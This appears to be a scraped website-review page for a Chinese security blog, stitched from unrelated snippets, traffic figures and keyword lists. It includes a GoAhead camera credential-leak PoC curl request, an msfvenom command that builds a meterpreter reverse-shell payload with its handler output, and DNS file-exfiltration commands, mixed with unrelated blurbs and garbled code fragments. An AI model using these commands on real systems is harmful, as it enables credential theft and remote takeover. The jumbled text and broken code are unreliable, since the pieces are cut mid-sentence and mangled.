blog.knownsec.com

Knownsec (知道创宇)

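Catching the shadow of "new code": analysis of multiple vulnerabilities in GoAhead-based network cameras. Date: 2017-03-19. Note: this article was first published on paper.seebug.org. PDF version download: Catching the shadow of "new code": analysis of multiple vulnerabilities in GoAhead-based network cameras. 1 Information (login credential) disclosure vulnerability caused by authentication bypass. PoC given by the author: curl http://ip:port/system.ini? Return byPri; }. Printf("user %s pwd:%s n",loginuse,loginpas);. Printf("user %s pwd:%s n",loginuse,loginpas);. PszParamName ) { return -1; } / check whether the url and the variable loginuse being looked up exist pos1 = strstr( pos, pszParamName ); if (! Pos1 ) { return -1; } / the url contains loginuse, so pos1 gets the corresponding value here and execution does not enter if(! Memcpy( pszParamValue, pos, -1 ); cannot run successfully.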

http://blog.knownsec.com/

TRAFFIC RANK FOR BLOG.KNOWNSEC.COM

Today's rating: >1,000,000
Best month (traffic rank, average per month): April
Highest traffic on (average per day of the week): Wednesday

CUSTOMER REVIEWS

Average Rating: 4.6 out of 5 with 7 reviews
5 star: 4
4 star: 3
3 star: 0
2 star: 0
1 star: 0

LOAD TIME

15.4 seconds

CONTENT

SCORE

6.2

PAGE TITLE
Knownsec (知道创宇) | blog.knownsec.com Reviews
<META>
KEYWORDS
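1 Blog home
2 Company website
3 Company events
4 Vulnerability advisories
5 Technical sharing
6 Security research
7 rss feed
8 A better and safer Internet
9 author Knownsec 404 Security Lab (知道创宇404安全实验室)
10 I. Vulnerability background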
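KEYWORDS ON PAGE
Blog home; company website; company events; vulnerability advisories; technical sharing; security research; rss feed; a better and safer Internet; author Knownsec 404 Security Lab (知道创宇404安全实验室); I. Vulnerability background; goahead; of course; vendors also carry out a certain amount of secondary development on it according to different product requirements; the incident originated from an article published by pierre kim on his blog; which disclosed multiple generic vulnerabilities present in more than 1250 camera models; II. Vulnerability analysis; if there are mistakes; corrections are welcome; loginuse&loginpas; PoC given by the author; curl; http; ip port/system ini; as can be seen; as long as; verification passes in every such case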
CONTENT-TYPE
utf-8
INTERNAL PAGES

blog.knownsec.com blog.knownsec.com
1

xss

http://blog.knownsec.com/tag/xss

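2015-11-03 author niubl Categories: Technical sharing. WordPress hit by DOM XSS vulnerability, millions of sites affected. 2015-05-08 author 刘 开水 Categories: Technical sharing. Jinja2 2.0 /utils.py urlize vulnerability. 2014-10-31 author niubl Categories: Vulnerability advisories. 2014-09-16 author 刘 开水 Categories: Technical sharing. 2014-07-14 author 糜忠岐 糜 Categories: Security research. Attack Your Android Apps By Webview. 2013-03-17 author niubl Categories: Technical sharing. 2012-03-06 author 余弦 Categories: Security research. 2012-02-16 author 余弦 Categories: Security research. Catching the shadow of "new code": analysis of multiple vulnerabilities in GoAhead-based network cameras. WordPress REST API content injection vulnerability incident analysis report. Joomla privilege escalation vulnerability CVE-2016-9838 analysis.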

2

[Beware of the ProFTPD high-risk security vulnerability (CVE-2015-3306)] Global early-warning report v1 - Knownsec

http://blog.knownsec.com/2015/04/proftpd_cve-2015-3306

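Beware of the ProFTPD high-risk security vulnerability (CVE-2015-3306): global early-warning report v1. Knownsec Security Research Team, 2015.04.23. Recently, the open-source FTP server program ProFTPd was found to have an unauthorized file copy vulnerability, CVE-2015-3306, which is caused by the mod_copy module in ProFTPd. A search of the whole network with the cyberspace search engine ZoomEye found that ProFTPd is widely used across global cyberspace; the vulnerability has a larger impact on servers in European and American countries, while the number of affected servers in China is small. ProFTPd's mod_copy module is meant for file copy operations, but in vulnerable versions the module's commands have no access authorization check, so any client can copy arbitrary files on the system with specific commands, and under certain conditions an attacker can use the vulnerability to obtain sensitive system files, gain server privileges, and so on. At present, in the packages of many Linux distributions such as Debian, ProFTPd is installed by default with the vulnerable mod_copy module loaded, which poses a direct threat to the system. Clone the latest source code from https://github.com/proftpd/proftpd/ and recompile and install.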

3

WordPress hit by DOM XSS vulnerability, millions of sites affected - Knownsec

http://blog.knownsec.com/2015/05/wordpress-lt-4-2-2-dom-xss

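WordPress hit by DOM XSS vulnerability, millions of sites affected. A DOM XSS vulnerability has been disclosed in WordPress, affecting millions of sites. The vulnerability is in the example.html page of the popular Genericons package for WordPress; the default theme Twenty Fifteen and the well-known plugin Jetpack both bundle this page, and analysis showed that example.html uses an old jQuery version that has a DOM XSS vulnerability. In 2011 dmethvin filed Ticket #9521 against jQuery 1.6.1; the cause is that the CSS selector expected by $() jQuery() can in other cases be used to create HTML elements, and if the code is written improperly (in fact there are many cases of improper coding) this produces a DomXSS vulnerability. jQuery 1.6.1. https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js". WordPress default theme twentyfifteen example. Example.html 297-299 lines:. Are we dealing ...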

4

Samba 3.0.37

http://blog.knownsec.com/tag/samba-3-0-37

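Tag Archives: Samba 3.0.37. Samba 3.0.37 EnumPrinters heap memory overflow vulnerability. 2015-05-20 author 刘 开水 Categories: Technical sharing. Samba 3.0.37. Catching the shadow of "new code": analysis of multiple vulnerabilities in GoAhead-based network cameras. WordPress REST API content injection vulnerability incident analysis report. Joomla privilege escalation vulnerability CVE-2016-9838 analysis. Nagios Core code execution vulnerability CVE-2016-9565 analysis. Roundcube 1.2.2 remote command execution vulnerability: vulnerability analysis. GitLab arbitrary file read vulnerability (CVE-2016-9086) and arbitrary user token disclosure vulnerability analysis. GNU tar extraction path bypass vulnerability (CVE-2016-6321) analysis. 2012 Knownsec. Powered by WordPress.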

5

Attack Your Android Apps By Webview - Knownsec

http://blog.knownsec.com/2013/03/attack-your-android-apps-by-webview

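Attack Your Android Apps By Webview. The webzine0x06 article "Android application security: XSS attacks on the Android platform" describes in detail the process, from discovery to exploitation, of browser cross-origin issues on the Android platform and of XSS vulnerabilities in application APKs. That article therefore concentrates on finding "read access to files on the system that are set other-readable" and overlooks the exploitation of "read access to the application's owner data files". This is because of the "fatal weakness" in the exploitation effect of browser cross-origin vulnerabilities mentioned in that article: to make up for inherent shortcomings in display and operation, the APK mechanism is widely adopted, that is, every major SNS service develops its own mobile client application, and this approach directly kills the value of exploiting browser cross-origin vulnerabilities across plain HTTP. For this very reason the applications of the major SNS networks integrate a "browser function" (Webview) themselves, and later testing found that this mechanism can pose a fatal threat to users. List of devices attached. Pull: building file list. Pull: /data...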

TOTAL PAGES IN THIS WEBSITE

18

LINKS TO THIS WEBSITE

navisec.it navisec.it

Network security blogs NaviSec.it – NaviSec Security Navigation (纳威安全导航) | Network security navigation

http://www.navisec.it/main/index/20

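Web navigation for network security practitioners – Ctrl D to bookmark. Technical sharing: HackerOne third-quarter TOP 5 vulnerability reports. Technical sharing: From PouchDB to RCE: a node.js injection vector. Linux Shell 1 /dev/null 2 &am…. EndNote v7.7.1 upgrade address.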

blog.safebuff.com blog.safebuff.com

git-flow usage | xl7dev

http://blog.safebuff.com/2016/11/04/git-flow-usage

Git push -u origin develop. Git checkout -b some-feature develop. Git push -u origin some-feature. Git pull origin develop. Git merge - no-ff some-feature. Git push origin develop. Git branch -d some-feature. Git push origin - delete some-feature. Git checkout -b release-0.1.0 develop. Git merge - no-ff release-0.1.0. Git merge - no-ff release-0.1.0. Git branch -d release-0.1.0. If you pushed branch to origin:. Git push origin - delete release-0.1.0. Git tag -a v0.1.0 master. Git push - tags.

blog.safebuff.com blog.safebuff.com

Archive | xl7dev

http://blog.safebuff.com/archives

73 posts in total. Keep on posting. Meterpreter Proxy and Route. Dumping Memory on iOS. Nagios Exploit Root PrivEsc CVE-2016-9566. Nagios Exploit Command Injection CVE-2016-9565. Transfer files via DNS. Apache Tomcat Remote Code Execution(CVE-2016-8735). Dell PowerEdge R530 Install ESXI6.0. Metasploit Reverse Shell via CMD. Theme - NexT.Muse.

blog.safebuff.com blog.safebuff.com

Dumping Memory on iOS | xl7dev

http://blog.safebuff.com/2016/12/28/Dumping-Memory-on-iOS

Dumping Memory on iOS. LLDB (http://lldb.llvm.org/). Tcprelay.py ([https://github.com/xl7dev/SecTools/tree/master/iOSTool]). 1 via usb to connect mobile and MacOS. 2 open xcode Window Devices. 3 scp root@iOSIP:/Developer/usr/bin/debugserver /debugserver. 4 lipo -thin arm64 /debugserver -output /debugserver. Armv6 devices: iPhone, iPhone2, iPhone3G, first- and second-generation iPod Touch. Armv7 devices: iPhone3GS iPhone4,iPhone4S iPad, iPad2, iPad3(The New iPad), iPad mini iPod Touch 3G, iPod Touch4. 6 ldid -Sent.xml debugserver. Lldb) im...

blog.safebuff.com blog.safebuff.com

Metasploit Reverse Shell via CMD | xl7dev

http://blog.safebuff.com/2016/11/01/Metasploit-Reverse-Shell-via-CMD

Metasploit Reverse Shell via CMD. Msfvenom -p windows/meterpreter/reverse tcp LHOST=192.168.0.103 LPORT=4444 EXITFUNC=thread -f vbs - arch x86 - platform win test.vbs. No encoder or badchars specified, outputting raw payload. Payload size: 354 bytes. Final size of vbs file: 7384 bytes. Msf exploit(handler) set payload windows/meterpreter/reverse tcp. Payload = windows/meterpreter/reverse tcp. Msf exploit(handler) set LHOST 192.168.0.103. Started reverse TCP handler on 192.168.0.103:4444.

tonyhead.com tonyhead.com

DISQUS/Duoshuo (多说) notes | TONYHEAD 通利堂

https://www.tonyhead.com/archive/2014/08021048

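881903 Commercial Radio programme 光明顶 Podcast https://881903.club/. Submitted on Sat, 08/02/2014 - 10:48. Using a third-party comment system can improve a website's security (bucket theory), many security websites. Drawback of domestic services: a website must obtain an ICP filing to integrate social comments. Remember to enable guest comments in the admin panel at https://站台名.disqus.com/admin/settings/ (站台名 is the site name) to get more comments. http://站台名.disqus.com/latest.rss can output the comments, combined with Yahoo Pipes. Thu, 10/15/2015 - 13:52. Switch to plain text editor. Allowed HTML tags: a em strong cite blockquote code ul ol li dl dt dd. Shadows over Innistrad Set Review (依尼翠暗影). 2 weeks 6 hours ago. 1 month 4 weeks ago. Guangzhou container architecture. PTI/Reefer training in YICT.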

blog.safebuff.com blog.safebuff.com

xl7dev

http://blog.safebuff.com/page/2

Raspberry pi as Download with Aria. Pi@raspberrypi: $ sudo apt-get install aria2. Pi@raspberrypi: $ git clone https:/ github.com/ziahamza/webui-aria2. Pi@raspberrypi: $ sudo mkdir /etc/aria2. Pi@raspberrypi: $ sudo touch /etc/aria2/aria2.session. Pi@raspberrypi: $ sudo touch /etc/aria2/aria2.conf. Pi@raspberrypi: $ sudo chmod 666 /etc/aria2/aria2.session. Pi@raspberrypi: $ sudo chmod 666 /etc/aria2/aria2.conf. Pi@raspberrypi: $ sudo vi /etc/aria2/aria2.conf. Respberry pi as time capsule. Proc /proc proc ...

blog.safebuff.com blog.safebuff.com

Transfer files via DNS | xl7dev

http://blog.safebuff.com/2016/12/11/Transfer-files-via-DNS

Transfer files via DNS. Sudo python server.py -f /path/to/file. Runmebat payloadserverhostname fileparts publicdnsserver. Powershell client.ps1 -server where.your.server.resolves.com. Runmebat payloadserver.yourdomain.com 42 8.8.8.8. If just testing internally, you can use the following example:. Runmebat payloadserverhostname fileparts payloadserverIPaddr. Apache Tomcat Remote Code Execution(CVE-2016-8735). Nagios Exploit Command Injection CVE-2016-9565. Theme - NexT.Muse.

TOTAL LINKS TO THIS WEBSITE

111

OTHER SITES

blog.knowmorechris.com blog.knowmorechris.com

knowmoreChris | Coffee. Food. Photography. Music. Hong Kong.

Coffee. Food. Photography. Music. Hong Kong. Skip to primary content. Skip to secondary content. 豚王 Butao Ramen: Where the ramen frenzy is started at. April 28, 2012. Back in mid year 2010, a ramen frenzy has since started in Hong Kong, this is all began with one ramen (拉麵) restaurant they even began hype before their grand opening with the help of local TV show and gourmet columnist – Butao Ramen 豚王. Butao Ramen, Causeway Bay. Butao Ramen, Central. Continue reading →. Share my blog if you liked it:.

blog.knownafrique.com blog.knownafrique.com

KnownAfrique | We make the law known

We make the law known. The journey so far. October 10, 2016. The Traffic Act (Cap.403): Minor Offenses Rules,2016. We aim to keep you informed of latest passed laws. Today, we bring you an update on the Traffic Act that was recently passed. Take a look at the minor offenses rules you should be aware of. As an upcoming feature on our Law App. You will be able to receive similar notifications directly on your handset! May 20, 2016. Job Opening]: COUNSEL (INVESTIGATIONS AND COMPLIANCE) at One Acre Fund.

blog.knowncircle.com blog.knowncircle.com

KnownCircle

Boring to Bodacious: 10 Benefits of Social Media Marketing for the Boring Business. This article was written by Ryan Hanley and originally published on Agency Nation. Insurance is boring. It just is. That doesn’t mean the marketing of insurance has to be boring. Over last five years I’ve given more than 60. Read more. Here’s Why Life Insurance Agents Must Disrupt Their Approach to Marketing. Customer Relationships in Insurance Industry. KnownCircle Expands Social Referral Marketing Services to Local Busi...

blog.knownhost.com blog.knownhost.com

- Because Your Business Deserves Quality Managed Hosting

KnownHost's sales and billing staff is available 9:00AM - 5:00PM EST Monday thru Friday via phone and email. Technical Support is available 24x7x365 via our email and/or helpdesk. Benefits From Using Video on Your Business Website. August 3, 2015. July 13, 2015. Lower Your Bounce Rate. As videos can seem annoying to some, the ones that users choose to click and watch can make all the difference for your sites bounce rate. Change Up the Content You Deliver. Another benefit of using videos on your business...

blog.knownmore.com blog.knownmore.com

knownmore.com website

blog.knowroaming.com blog.knowroaming.com

KnowRoaming | Reduce Roaming Fees

Traveling with kids: 6 Travel Tips. August 10, 2015. So you’ve booked your vacation and you’re excited to show your kids the world. We get it we love kids too! We want to help you enjoy the fun amidst the inevitable chaos so check out our best tips for traveling with kids below. 1 Get a stroller you can bring on airplanes. You don’t have to be the last ones off the plane anymore. Get going quickly with a stroller that collapses into the size of a backpack. 3 Find the most addictive games. If you’re looki...

blog.knowsee.com blog.knowsee.com

Default Parallels Plesk Panel Page

Web Server's Default Page. This page is generated by Parallels Plesk Panel. The leading hosting automation software. You see this page because there is no Web site at this address. You can do the following:. Create domains and set up Web hosting using Parallels Plesk Panel. Parallels is a worldwide leader in virtualization and automation software that optimizes computing for consumers, businesses, and Cloud services providers across all major hardware, operating systems, and virtualization platforms.

blog.knowshops.com blog.knowshops.com

Knowshops Blog

Know all your options before you spend. February 6, 2013. • 353,458 notes. Click to gain hundreds of new followers! February 6, 2013. Boostlikes helps you boost your twitter likes. February 6, 2013. • 6,318 notes. February 5, 2013. • 10,779 notes. Checkout more shoes here. February 5, 2013. • 5,231 notes. Checkout more jewellery store here. February 5, 2013. • 3 notes. By Vietto velvet skirt. By Miracle Eye black Chloe dress. By Allen Company tie dye scarf. February 5, 2013. In the re...

blog.knowsky.com blog.knowsky.com

Blog aggregation_Blog syndication_When we Blog together_Blog.knowsky.com

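1 Deploying IIS 1.1 Installing WAS: IIS originally does not support services over non-HTTP protocols; for IIS to support net.tcp, WAS must be installed first (Windows Process Activation Serv. After installing MDT2012 U1 X64+ADK+WDS on a WIN2008 R2 X64 system, I deployed a DELL OEM win7 system; after deployment the system could not be activated, but on a WIN2003 SP2 system. The hide-message-header feature in Outlook 2010 does not work well: View - View Settings - Other Settings - tick Hide header information. ASPNET Web API tutorial 5.2 Sending HTML form data: URL-encoded form data. Note: this article is part of the ASP.NET Web API tutorial series; if this is your first time reading the series, please read the earlier parts first. 52 Sending HTML Form Data 5.2 Sending HTML forms. 1. I have a spreadsheet, about 6.3MB, all text. Win7 64-bit keeps blue-screening, Debug information attached. AspNet MVC4 getting-started guide, official tutorial localization part 10 - examining the Detail and Delete methods. Ois Beaufort has again found, in Chromium's recent code base, a new 端...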

blog.knowsus.org blog.knowsus.org

KnowSus Blog: Sharing Personalised Knowledge

How to convert your failure into success. August 9, 2015. How to choose a right career path. August 5, 2015. Subscribe to KnowSus Newsletter. Tips for writing a successful Curriculum Vitae (CV). August 2, 2015. About Author: Dhruv Mishra completed his masters in Biomedical Sciences from University of Veterinary Medicine Hannover, Germany, and currently enrolled as Doctoral Researcher in Medicine…. Read Article →. Apologies, but no entries were found. For Further Details, See Below:. Word limit: 500 words.